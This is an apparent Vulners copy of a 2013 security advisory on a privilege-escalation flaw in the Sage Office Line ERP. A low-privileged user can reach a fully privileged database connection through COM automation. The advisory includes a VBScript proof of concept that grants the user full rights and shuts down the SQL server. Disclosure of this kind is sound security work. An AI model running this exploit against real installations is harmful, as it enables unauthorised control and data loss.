Vulners
Lucene search
German ERP Sage Office Line Privilege Escalation
`
Security Vulnerability in German ERP system "Sage office Line"
Recently, I discovered a Securtiy Security Vulnerability in the
German ERP system "Sage office Line", created by German branch of the
UK-based Sage Group. The Software is sold in Germany, Austria and
Switzerland. According to their website, Sage Germany has more than
250.000 customers.
-------------------------
Affected products:
-------------------------
- Sage Office Line Evolution 2012 (with newest patches installed)
- Sage Office Line Evolution 2013 (with newest patches installed)
- most likely previous versions (untested)
-------------------------
Effects:
-------------------------
- Code execution
- privilege escalation
- Data loss
-------------------------
Details:
-------------------------
The software is based on a Microsoft Access Frontend Client
(available as ADE and ADP) and some server-based tools. Microsoft SQL
Server is used to store all data. A typical client installation on the
computer of each office worker contains the MS Access frontend and
also many .Net assemblies called via COM-interop by the Access client.
Main entry point for the Vulnerability is the so-called
"mandator-object" which is initiated when a user logs in to the
software. This object holds all information regarding the accessed
database and also about the priviliges of the user.
If a user has valid credentials to start the software, even if he has
minimal permissions, he can use local VBScript and COM automation to
gain full access to the mandator object. This object holds, among
other interesting things, an ADO.NET connection object, which was
instantiated with an SQL user with full rights on the affected
database.Using the ADO.NET connection object, the user can give
himself full permissions or even delete all data in the database.
According to Sage Software, there is a feature called "Erweiterte
Codesicherheit" ("Extended Code Security") which should secure the
system by blocking non-signed code from accessing the System. The
Feature has no effect on the vulnerability described in this post.
-------------------------
Proof of Concept:
-------------------------
The following code has to be saved local in a VBS file. Maybe it is
necessary to adjust the path to the MS Access ADE file. It grants full
access to the current user and then tries to shutdown the SQL server
service.
Set objAccess = GetObject("C:Program Files (x86)SageOffice
Line6.1Abfolabf_001.ade")
Set goMandant = objAccess.Run("goMandant")
goMandant.oData.Execute "UPDATE USysSecurityClients SET Rights = 3
WHERE UserName='" & goMandant.oBenutzer.sName & "'"
goMandant.oGlobalData.Execute "SHUTDOWN WITH NOWAIT"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Sep 2013 00:00Current
0.9Low risk
Vulners AI Score0.9